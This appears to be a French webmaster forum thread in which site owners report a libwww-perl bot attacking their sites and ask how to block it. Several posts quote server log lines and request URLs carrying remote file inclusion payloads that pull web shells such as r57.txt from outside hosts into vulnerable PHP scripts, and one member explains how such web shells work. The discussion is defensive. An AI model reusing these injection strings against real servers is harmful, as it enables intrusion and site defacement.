Libwww-perl 5.69 : qu'elle est ce bot de hacker ?

WRInaute occasionnel
Salut a tous

j'ai un drole de bot nommé Libwww-perl 5.69, qui crawler cette page :

example.com/index.php?path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

et evidement ça affiche la page d'index


tenez matez ça pour voir : -http://bhlynx.org/

bizarre, vous connaisez ?

Un mec tente de me hacker ? comment le bloquer ?

[Edit kazhar : Inutile de lui faire un lien !]
 
WRInaute occasionnel
pour faire son propre moteur de recherche ?

mais quand on lit les fichier sur le ftp du mec... avec des jargon de hacking.. ca fait peur
 
WRInaute passionné
WRInaute passionné
Ahhh !!!

Il s'amuse même a avoir les mots de passe des banques !
-http://bhlynx.org/htdig/sql/Pics/scam.JPG

Dans son fichier texte...

Très grave !!!
 
WRInaute discret
Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux

j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3
 
WRInaute occasionnel
paria a dit:
Il vaut mieux se retirer les gars il s'agit d'une équipe de défaceur, c'est exacte, ils ont du niveaux

j'ai retrouvé des pages défacés dans le cache google, ils utilisent un schellcode avec un scaner de vulnérabilité
-http://72.14.221.104/search?q=cache:TivVV-LKQtMJ:win.intrasys.com.br/imobiliaria/optarimoveis.com.br/admin/
-http://72.14.221.104/search?q=cache:rUxy6Ps0VEwJ:europass.oeek.gr/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D12%26Itemid%3D19%26lang%3

J'ai pas tous compris, c'est quoi schellcode avec un scaner de vulnérabilité ? dans qu'elle but ?

guicara merci d'avori tester tous ça

visiblement il on detecté que on fouiller dans les fichier, il n'y a plus rien dans le dossier -http://bhlynx.org/htdig/ , il on du paniquer et tout effacer

On ai dans le grand banditisme du web vous pensez la ?
 
WRInaute passionné
marion17 a dit:
On ai dans le grand banditisme du web vous pensez la ?

Quand je vois qu'ils sont sur un site d'une banque, logué surment à un compte piraté, je dis oui, j'ai sauvegarder l'imprime écran sur mon dd ^^
 
WRInaute occasionnel
guicara a dit:
marion17 a dit:
On ai dans le grand banditisme du web vous pensez la ?

Quand je vois qu'ils sont sur un site d'une banque, logué surment à un compte piraté, je dis oui, j'ai sauvegarder l'imprime écran sur mon dd ^^

Ben punaise....

En tous cas leurs bot n'ai plus repasser sur mon site depuis que j'ai poster ce message, il on du voir le referer de ce topic certainement.... et comprendre certains mot de Français...
T'a bien fait de sauvegarder des données !
 
WRInaute discret
Je confirme. Base MySQL mise KO pendant 45 minutes dans la nuit du 24 décembre.

200.24.106.14 - - [02/Dec/2006:09:26:47 -0500] "GET /forum/archive/index.php/examples/index.php?send=devilteam&script=http://www.chopstickz.net/xo/cmd.do? HTTP/1.1" 302 345 "-" "libwww-perl/5.65"

212.227.118.59 - - [04/Dec/2006:04:18:55 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.64"

209.97.196.230 - - [04/Dec/2006:04:18:56 -0500] "GET /forum/archive/index.php/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 302 280 "-" "libwww-perl/5.805"
89.108.66.115 - - [20/Dec/2006:06:59:24 -0500] "GET /forum/archive/index.php/tools/send_reminders.php?includedir=http://www.tambenlik.net/lol1.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
194.135.81.30 - - [23/Dec/2006:10:06:42 -0500] "GET /forum/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://filizakin.org/lmr.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"

70.86.21.194 - - [24/Dec/2006:03:25:08 -0500] "GET /forum/archive/index.php/inc/cmses/aedatingCMS.php?dir[inc]=%20inurl:%22flashchat%22+site:frhttp://filizakin.org/lmr.txt? HTTP/1.1" 200 5783 "-" "libwww-perl/5.805"

72.232.77.106 - - [24/Dec/2006:03:25:10 -0500] "GET /forum/index.php?menu=deti&page=%20allinurl:%22index.php?menu=deti&page%22http://filizakin.org/lmr.txt? HTTP/1.1" 200 73494 "-" "libwww-perl/5.805"

Database error xxxxxxxxxxx:

mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (11)
/xxxxxxxxxxxxxxxxxxxxxxxx/public_html/forum/includes/class_core.php on line 273

MySQL Error :
Error Number :
Date : Sunday, December 24th 2006 @ 03:22:19 AM
Script : http://www.xxxxxxxxxxxxxxxxxxxx/archive ... rg/lmr.txt?
Referrer :
IP Address : 72.232.108.42

Portez plainte à votre hébergeur et à leur FAI. S'ils font du dégat, étudiez la possibilité d'une action en justice.
 
WRInaute passionné
Maintenant que j'ai posté sur ce topic et mis en évidence quelques imprime écran, j'ai peur pour mon site :mrgreen:

Au moins sa va tester la sécurité de mes scripts Php :p
Allé hop une petite sauvegarde mysql...
 
WRInaute passionné
path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

==> scanner de vulnerabilité par RFI (remote file inclusion)

en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell

et le " ? " coupe la variable d'une possible concatenation dans le path

rog
 
WRInaute occasionnel
rog a dit:
path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

==> scanner de vulnerabilité par RFI (remote file inclusion)

en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell

et le " ? " coupe la variable d'une possible concatenation dans le path

rog

Ou laj 'ai pas tous comprit

c'est censé faire quoi sur le serveur de vouloir inclure un fichier.gif (qui est en fait un script php avec extention .gif je pense ?

C'est la configuration appache et pas le script php qui est en cause si il y a uen vulnerabilité ?

Un web shell c'est quoi ?

merci :)
 
WRInaute passionné
un webshell est une script web (php perl python) qui donne acces à une console shell sur le server ou il est uploadé

la vulnerabilité recherchée est bien dans le script

le fichier est gif,dat,cmd,etc.. parce que si il etait en php, le server ou il est hébergé renverrait le code interprété

alors que en gif, il renvoit la source qui va etre interprétée par le server vulnerable

rog
 
WRInaute occasionnel
et aller ça recomence, il on changés de site visiblement :

-http://ascnet.by.ru/

url qu'il tente d'injecter :

-index.php?id=http://ascnet.by.ru/cmd/list.txt?

si vous arrivez a farfouiller dans tous ces fichiers dites nous ce que vous trouvez.. moi j'ai pas le temps mais ça me soul déjà ....

ils on vraiment rien d'autre a faire ces voyous...

[Edit kazhar : Inutile de lui faire un lien]
 
WRInaute occasionnel
rog a dit:
lol

y a tous les outils pour rooter un server jusqu'au kernel 2.6.16

rog

houla...

Et pourquoi font t'il ça selon vous ?

pour "s'amuser" ou faire chanter le webmaster avec une rançon, ou autre ?

puis je comprend pas pk il affiche ça sans portection directement sur un domaine...
 
Nouveau WRInaute
ca fait froid dans le dos...

Ce matin j'arrive (en retard comme tous les lundis matin) au bureau et regarde mes mails. Sur tous mes sites, j'ai un système d'envoi automatique de mail pour chaque erreur serveur (404, 403 et 401 principalement).
Là au lieu de la dizaine de mails que je retrouve normalement, j'en ai 450 !

et voilà la request_uri : /includes/javascript//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://alexen.ru/xpl/r57.txt??
et également :
/includes/javascript//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alexen.ru/xpl/r57.txt??

Bien sûr je sais que je n'ai ni de forum ni de caddie virtuel sur mon site, donc je suis rassuré, je sais que ça n'a pas pu aboutir...

Et heureusement, car là encore quand on va à -http://alexen.ru/xpl/r57.txt (n'y allez que si vous avez un anti virus digne de ce nom) on découvre la même chose que guicara en décembre : un sale bête...

et le *** exploite deux failles connues :
- http://www.frsirt.com/bulletins/7239 pour PNphpBB2
- http://www.frsirt.com/bulletins/3370 pour CubeCart

Mais malheureusement, je me sens impuissant ! Qui contacter pour dénoncer un site russe qui tente de pirater un site français ? Quelle action mener sachant que dans moins de 48h, l'url aura changé, et que sa cible sera un tout autre site...
[/url]


[Edit kazhar : Inutile de lui faire un lien; Maitrise tes mots]
 
WRInaute occasionnel
Vous avez vu ? Y'a un lien direct vers l'URL de ce post sur la page accueil du site !!! 8O

-http://ascnet.by.ru/ (deuxième lien dans le menu de gauche :!: )

[Edit kazhar : Inutile de lui faire un lien !]
 
Nouveau WRInaute
début Aout bot libwww-perl

venant de:
hosting01.incap.ru
80.93.56.0 - 80.93.59.255

avec comme url
/index.php?Language=http://faq (point) matriarchat (point) net/117.txt??

pour moi c'est de la racaille Russe à exclure du .htaccess
 
Nouveau WRInaute
Bonjour, désolé du up de ce topic, mais ce bot vient de crawler mon site / forum, j'ai fais un backup de mes bases sql, puisque cela à l'air d'être un bot néfaste que sont les mesures à prendre pour l'exclure via le .htaccess ? Merci pour votre aide.
 
Discussions similaires
Haut